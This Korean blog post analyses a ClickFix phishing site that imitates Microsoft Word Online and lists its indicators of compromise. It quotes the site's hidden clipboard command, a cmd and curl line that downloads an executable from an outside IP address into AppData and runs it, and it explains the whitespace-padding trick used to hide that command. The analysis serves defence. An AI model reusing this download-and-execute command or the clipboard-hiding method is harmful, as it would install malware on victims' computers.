오늘은 마이크로소프트 온라인 워드 사칭 ClickFix 공격 사이트 분석을 해보는 시간을 가져 보겠습니다.
해당 클릭픽스(ClickFix) 사이트는 Microsoft Word Online인 것처럼 꾸미는 것이 특징입니다.
여기서 The "Word Online" extension is not installed in your browser. To view the document offline, click the "How to fix" button. 이라는 부분처럼 How to fix 부분을 누르게 되면 다음과 같은 코드들이 실행합니다.
const hiddenPart = 'cmd (/)c start "" /min curl -s -o %APPDATA%\\SearchIndex(.)exe hxxp://193(.)233(.)19(.)134/page && start /min %APPDATA%\\SearchIndex(.)exe';
.....
자세하게 확인을 하고 싶으며 웹 소스를 열어 보면 자세하게 확인을 할 수가 있습니다.
여기서 안내를 하는 것처럼 윈도우 키+R를 눌러서 실행하게 되면 악성코드가 다운로드 및 실행이 됩니다.

분석
cmd.exe 실행->Windows curl.exe 사용을 하면 간단하게 실행->지정된 외부 서버에서 파일 내려받기->%APPDATA%\SearchIndex.exe로 저장->다운로드된 실행 파일을 간소하게 실행
SearchIndex.exe라는 이름은 Windows 검색 인덱싱 구성요소처럼 보이게 위장을 하고 있음
저장 위치
C:\Users\(사용자명)\AppData\Roaming\SearchIndex.exe
다운로드 주소
hxxp://193(.)233(.)19(.)134/page

여기서 핵심 자바스크립트는 다음과 같습니다.
const fullClipboard = hiddenPart + padding + visiblePart;
hiddenPart 뒤에 대량의 공백인 padding을 삽입하고 그 뒤에 정상적인 CAPTCHA 안내문처럼 보이는 visiblePart를 이어 붙여 하나의 클립보드 문자열인 fullClipboard를 생성하는 코드이며 악의적인 명령을 실행하기 위해서 화면에서 잘 보이지 않게 만들면서 사용자가 뒤쪽의 정상적인 안내문만 확인만 할 수가 있게 만들어져 있습니다.
navigator.clipboard.writeText() 부분을 악용하고 있음
사용자의 시스템 클립보드에 복사하는 JavaScript 기능
여기서는 "How to fix" button.버튼을 눌렀을 때 악의적인 명령을 실제 클립보드에 저장되도록 하는 핵심 역할을 하는 하고 있습니다.
현재 글을 쓰는 시점에서는 악성코드 다운로드가 이루어지지 않는 상황
IOCs
docs163(.)com
193.233.19(.)134
hxxp://193.233.19(.)134/page
쉽게 이야기하면 클릭팩스(ClickFix)사이트는 활성화 상태 하지만 악성코드 다운로드 사이트는 비활성화 상태입니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| 7-Zip 악성 압축 파일로 악용 가능한 원격 코드 실행(RCE) 취약점 수정 (0) | 2026.07.21 |
|---|---|
| Kimsuky(김수키)에서 만든 악성코드-입력자료.lnk (0) | 2026.07.20 |
| 직원 설문조사 보고서 사칭 AI 로 제작된 Remcos 악성코드-직원 설문조사 보고서.vbs (0) | 2026.07.17 |
| 윈도우 10,윈도우 11 KB5101650,KB5099414,KB5099539 보안 업데이트 (0) | 2026.07.16 |
| 281개의 무료 안드로이드 VPN 앱 트래픽 유출 암호화되지 않은 데이터 사용자 추적 문제가 발견 (0) | 2026.07.15 |
| Kimsuky(김수키) 전세 계약 특약 정리 위장한 악성코드-전세 계약 특약 정리.lnk (0) | 2026.07.13 |
| 김수키(Kimsuky)에서 만든 악성코드-UNIMAC Policy Letter 6 MACHA Visitors (0) | 2026.07.09 |
| 커뮤니티의 도움으로 Flipper Zero 펌웨어 개발이 계속 진행이 됨 (0) | 2026.07.08 |





